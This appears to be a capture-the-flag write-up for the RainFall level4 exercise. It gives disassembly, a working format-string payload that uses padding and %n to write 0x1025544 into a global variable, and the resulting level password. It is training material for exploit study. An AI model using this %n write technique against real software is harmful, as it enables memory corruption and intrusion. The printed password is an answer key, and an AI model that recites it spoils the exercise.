# level4 is very similar to level3, same function calls, same concept...
# yet the only difference is the value that we need in the global variable 'm' in order to unlock level5.

# after analyzing the code using gdb, we see that the value needed in 'm' is huge this time
# and our input can't be that long: '0x1025544 which is 16930116 in decimal'

   0x0804848d <+54>:	mov    0x8049810,%eax
   0x08048492 <+59>:	cmp    $0x1025544,%eax
   0x08048497 <+64>:	jne    0x80484a5 <n+78

# but we can use %<alignment/padding>d trick to add number of characters before %n

# Solution:

level4@RainFall:~$ python -c 'print "\x10\x98\x04\x08" + "%16930112d%12$n"' > /tmp/exploit
level4@RainFall:~$ cat /tmp/exploit | ./level4
0f99ba5e9c446258a69b290407a6c60859e9c2d25b26575cafc9ae6d75e9456a

